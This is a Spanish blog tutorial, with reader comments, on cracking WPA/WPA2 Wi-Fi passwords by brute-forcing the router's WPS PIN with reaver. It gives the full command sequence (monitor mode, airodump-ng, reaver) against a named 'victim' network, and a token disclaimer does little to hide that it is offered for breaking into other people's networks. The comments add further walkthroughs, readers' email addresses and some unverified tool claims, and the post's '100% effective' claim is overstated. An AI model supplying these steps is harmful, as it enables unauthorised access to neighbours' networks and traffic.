Inicio > Debian, Seguridad informática, Terminal > Sacar contraseña wpa/wpa2 sin diccionario mediante reaver

Sacar contraseña wpa/wpa2 sin diccionario mediante reaver

* Este tutorial ha sido realizado meramente con fines educativos e ilustrativos,  no haciendonos responsables de los daños derivados o delitos que pudieran llevarse a cabo.*

Hoy veremos como sacar la contraseña wpa mediante reaver por supuesto sin diccionarios. Este metodo es 100% efectivo para todos los router que tengan activado WPS.

Esta vulnerabilidad ha sido descubierta no hace mucho y un tal Craig Heffner  ha desarrolado una aplicación “reaver” que nos lo hace todo muy facilito.


Ojo, todos los routers no tienen WPS y además debe estar activado, si bien normalmente vienen por defecto.

¿ Y que es WPS?, pues según la wikipedia es :

WPS (Wi-Fi Protected Setup) es un estándar promovido por la Wi-Fi Alliance para la creación de redes WLAN seguras. En otras palabras, WPS no es un mecanismo de seguridad por sí, se trata de la definición de diversos mecanismos para facilitar la configuración de una red WLAN segura con WPA2, pensados para minimizar la intervención del usuario en entornos domésticos o pequeñas oficinas (SOHO). Concretamente, WPS define los mecanismos a través de los cuales los diferentes dispositivos de la red obtienen las credenciales (SSID y PSK) necesarias para iniciar el proceso de autenticación.

WPS permite la conexion a cualquier elemento de nuestra red mediante un PIN interno de nuestro router y aquí es donde trabaja nuestro reaver, explotando esa vulnerabilidad. Hará conexiones probando diferentes PIN hasta dar con el, pero dará seguro… jajajajaja.

Mirar la imagen de un router con WPS :

Por cierto ni tiene que decir que nuestra tarjeta inalambrica debe poder colocarse en modo monitor para poder seguir adelante con este tutorial. yo personalmente tengo una realtek RTL8188CE con driver rtl8192ce compilado.

Lo primero que haremos es descargar nuestro reaver, descargalo aquí.

A continuación lo desempaquetamos con:

tar -xvf reaver-1.4.tar.gz

Ahora nos toca entrar en el directorio creado y compilarlo:

./configure

make

make install

Pasemos a instalar aircrack en nuestro pc, podemos descargarlo aquí y lo instalamos muy facil ya que viene en paquete.deb, yo particularmente he usado la versión aircrack-ng_1.1-5_amd64.deb.

Bueno, ya lo tenemos instalado.

Con el siguiente comando (vease en la imagen)*   veremos que redes están a nuestro alrededor y si tienen wps:

iw wlan1 scan

* Nota: he omitido bastante parte captura, es extensa

Aqui veremos todas las redes  y nos fijamos en  la mac, bssid, canal y muy importante si dispone de WPS como en la imagen anterior.

Apuntamos esos datos.

Pondremos nuestra tarjeta en modo monitor:

airmon-ng start wlan1  (en mi caso pudiendo ser wlan0,ath0,etc)

Echaremos nuestra conexión normal wlan1 abajo:

ifconfig wlan1 down

Supongamos que la victima tiene estas caracteristicas: WLAN_8FF8 , 6C:33:88:A1:DF:63 y esta en el canal 6

Ahora vayamos al grano:

airodump-ng mon0 -w wps-test –beacons –channel 6 –bssid 6C:33:88:A1:DF:63

y ahora lanzariamos el ataque con :

reaver -i mon0 -b mac victima -c canal de la victima -e ssid de la victima (nombre red) -d 12 -vv

En nuestro caso:

reaver -i mon0 -b 6C:33:88:A1:DF:63 -c 6 -e WLAN_8FF8 -d 12 -vv

Y ahora a esperar …. paciencia … si queremos hacer pausa para no tener que estar tanto tiempo sin conexión podemos apretar CONTROL+C y nuestro craqueo quedará salvado y podremos volver a continuar desde el punto en que se suspendio.

Puede tardar bastantes horas , en mi caso hasta 36 horas más o menos hasta que aparece esto:

Saludos y hasta la próxima     ;-)

About these ads
  1. Ricardo Martinez®
    enero 1, 2013 en 6:26 am

    con el aerodick.kps acelera el trafico para asi conseguir la clave en menos de 1hr wpa-wpa2-psk ATTE: RMKG-Systems®

    • enero 27, 2013 en 10:09 am

      que es eso del aerodick.kps. Y como se hace?

  2. andres molina
    enero 14, 2013 en 1:52 pm

    no se entiende nada!

  3. enero 16, 2013 en 7:41 am

    oyes una pregunta que DISTRO usas ubuntu, debian,suse?? digo no se en cual funcione reaver, disculpa mi ignorancia :D

    • septiembre 14, 2013 en 6:19 pm

      al ser .deb descartamos suse por lo que son deribadas de debian y ubuntu, y reaver va en todas al tenerlo que instalar con make make intall y t recomiendo backtraq que ya viene con todo xD

  4. susana
    enero 22, 2013 en 3:19 pm

    hola, me descargué todo, pero no se como instalar reaver, no viene archivo de instalación, lo he de copiar en un cd?, lo puedo usar en una maquina virtual?
    tar -xvf reaver-1.4.tar.gz esto donde lo pongo?, gracias

    • chrisfer
      abril 3, 2013 en 5:44 pm

      en consola si no tienes linux instalado puedes usar una maquina virtual con linux(debian, ubuntu)

  5. susana
    enero 22, 2013 en 5:38 pm

    vale, lo que preguntaba donde lo pongo, una vez dentro de wifiway, se habre consola, que es como cuando trabajamos desde el simbolo del sistema y hay es donde se pone esto, yo tenia la carpeta comprimida en un usb y reaver en una maquina virtual y asi lo pude guardar dentro de wifiway. De todas formas aun no logré nada, wps loked no, o sea que esta abierta, pero de hay no pasé, mientras probaba, ponia warning y no recuerdo que mas, seguiré probando, un saludo

  6. CARLOS MOYA
    febrero 13, 2013 en 10:03 pm

    HOLA ME PODRIAS ENVIAR UN CORREO a calbet100@hotmail.com para que me expliques mejor porfa ya baje el archivo pero nose como compliarlo por fa ayudame

  7. Carlos
    febrero 16, 2013 en 11:59 am

    Con las Orange no funciona. ¿Sabeis como utilizarlo con redes Orange?

  8. mon0
    febrero 17, 2013 en 10:42 am

    # iw dev wlan0 scan

    http://wireless.kernel.org/en/users/Documentation/iw

    Tu comando para escanear no me funciona. El especificado arriba si

    • Rod
      octubre 18, 2013 en 11:06 am

      Lo mejor sera que ya instalado aircrack escribas para escanear

      airodump-ng mon0

      para detener el escaneo presionas las teclas Ctrl+C. De esta manera te aparecera el escaneo de las redes cercanas o bien las que detecte tu dispotivito, en caso de que no tengas instalado aircrack instalalo con el siguiente comando

      sudo apt-get install aircrack-ng

      asi aclaro que lo normal es que automaticamente se descargue la version correspondiente a la arquitectura de tu sistema (32 o 64 bits) y ahora si sigue con el proceso. Creo que eso le falto explicar al autor del post

  9. chiclecoco
    febrero 22, 2013 en 4:10 am

    Holaa chicos y chicas! Yo logré poner en marcha esto. Son las 4 am y dejare el ordenador hasta 4-5 horas q es el tiempo estimado para dar con la cable.
    os comento varios puntos:
    Hice la prueba en backtrack4, distrucion de linux q puedes conseguir en la pagina oficial.
    Reaver se instala desde backtrack, desde una consola
    Tienen q tenrr potencia o tener la red q van atacar relativamente cerca pq el.primer paso del programa es asociarse ala red. Les dejo mi correo y a quien le intere el tema le explico con mayor profundidad: ane.aneudy@gmail.com

    Saludos

  10. jubele
    febrero 23, 2013 en 2:56 pm

    hola tan sencillo como bajarse el wifiway 3.4 y el reaver 1.4 y el inflator 1.0 luego esos dos archivos los meteis en la carpeta del wifiway en el apartado modulos y listo ya podeis seguir los pasos anteriores de arriba,eso si escrito por consola,saludos!.

  11. febrero 23, 2013 en 4:47 pm

    Gracias Amigo

  12. 123
    marzo 26, 2013 en 11:11 am

    [+] Waiting for beacon from 00:1C:A8:FE:99:EF
    [+] Switching mon0 to channel 6
    [+] Associated with 00:1C:A8:FE:99:EF (ESSID: GUNEYLTD)

    it was be waiting 30 minutes and dont do something what is your idea?

  13. walter
    abril 15, 2013 en 3:30 pm

    lo logro en 15 segundos.

  14. iskapy
    mayo 29, 2013 en 9:51 pm

    como hago todo esto desde windows 7? alguien puede explicar paso a paso? se agradece la ayuda de antemano

    • Rod
      octubre 18, 2013 en 11:15 am

      Para lograrlo desde w7 descarga Oracle VirtulBox, es gratuito y pesa menos de 100 megas, para comodidad puedes usar una distribucion de linux ya sea basada en ubuntu o bien wifiway que esta ultima no pesa mas de 500 megas y puedes abrir el virtualbox, crear una nueva maquina configurarla para el sistema operativo y darle en iniciar.

      NOTA: Para que puedas usar VM virtualbox en tu pc con w7 necesitas de una pc con buenos recursos, de lo contrario puede que no funcione. Si eso no va, busca en el beato youtube como crear un live usb y usas el wifiway que descargaste

      Una vez hayas creado el live USB reinicia tu pc, selecciona tu memoria para el boot, no todas las pcs bootean con la misma tecla asi que lee las letras de abajo cuando va encendiendo tu maquina, la mia funciona con F12, y una vez seleccionada tu memoria espera a que cargue el Wifiway, ya abierto veras al sistema. Antes de que manosees o te sientas como perrito en periferico sin saaber que hacer instala el reaver como esta descrito en esta pagina y realiza el procedimiento. Busca como instalar inflactor que sirve como herramienta grafica y es mas facil si no estas acostumbrado o si te sientes perdido escribiendo los comandos. El Inflactor es opcionoal y con ese no haras lo que esta descrito en el proceso de arriba. Si tienes duda Escribeme aqui

  15. CARLOS
    mayo 31, 2013 en 3:25 am

    hola a todos pude sacar wps pin 9035xxxx
    wpa psk de 64 caracteres
    ap ssid network
    el tema es y ahora como sigo una ayuda por favor

  16. junio 28, 2013 en 10:40 pm

    muchas gracia!!! Yo llevo bastante rato y todavia no esta!!! Como cuanto dura??

  17. sceben
    septiembre 22, 2013 en 5:57 am

    Hay alguna forma de sacar la clave sin wps activado?
    Se q con este no, pero algun otro modo…
    Ninguna d las cercanas tiene el wps activado….

  18. noviembre 22, 2013 en 8:07 pm

    PASO A PASO

    Descargar back track 5 r 2
    Ejecutarlo en live cd (startx)
    Opcional (cambiar idioma del teclado)
    #airmon-ng
    #airmon-ng start wlan0 —> wlan0 es un ejemplo podría variar
    #wash -i mon0 –> Aqui solo nos mostrara redes q posean wps

    #reader –> aquí saldrá un error y al final nos da un ejemplo de la sintaxis correcta, solo cambiamos la mac de ejemplo por la victima, y si quieren en ves de “-vv” le escriben “mon0″

    ahora empieza a crecer el porcentaje y al final aprox 3 horas si la señal marca de -60 hacia abajo, nos dará la clave.

  19. diciembre 25, 2013 en 10:46 pm

    y no hay algún programa mas fácil esque no se mucho de informática aunque e conseguido una contraseña con wifipass en 25minuts pero se me quito ese wifi y no volvi a verlo nunca XD pero estoy intentando otro y nada se tarda un monton bueno lo intentare de nuevo XD

  20. kensu_90
    enero 9, 2014 en 2:09 pm

    usen wifislax ahi ya viene listo para usar si nesecitan ayuda avisenme nomas

  21. Iguanamarina
    febrero 17, 2014 en 9:34 pm

    Buenas,
    En mi caso de momento lleva unas 24 horas y todavía pone solamente un 4%.
    Sin embargo se ha parado desde hace ya unas horas y no parece avanzar. Sigue estancado en Sending VCS Nack y no avanza.
    Es normal que se pare así?

    • h20newbie
      marzo 29, 2014 en 10:17 pm

      Quizás te llegue la señal muy justa …

  22. German
    mayo 1, 2014 en 7:55 am

    Hola estoy usando WIFISLAX y dentro esta el INFLATOR 1.0 ahora bien…el problema que tengo es que hay muchas redes WPA dando vueltas por el aire de mi casa pero cuando ESCANEO las WPS con el INFLATOR SOLO ME APARECE UNA SOLA o DOS…..y yo se QUE HAY MAS porque me aparecen con el FINDBOTTLE o como se llame…. ALGUIEN SABE PORQUE NO ME APARECEN ESAS REDES CUANDO ESCANEO CON REAVER!!! GRACIAS!!!

  23. abdo
    julio 6, 2014 en 2:53 pm

    mi aparato no cje na mas que wpa2 wpa antena tubo de 18dbi y

  1. No trackbacks yet.

Deja un comentario

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

%d personas les gusta esto: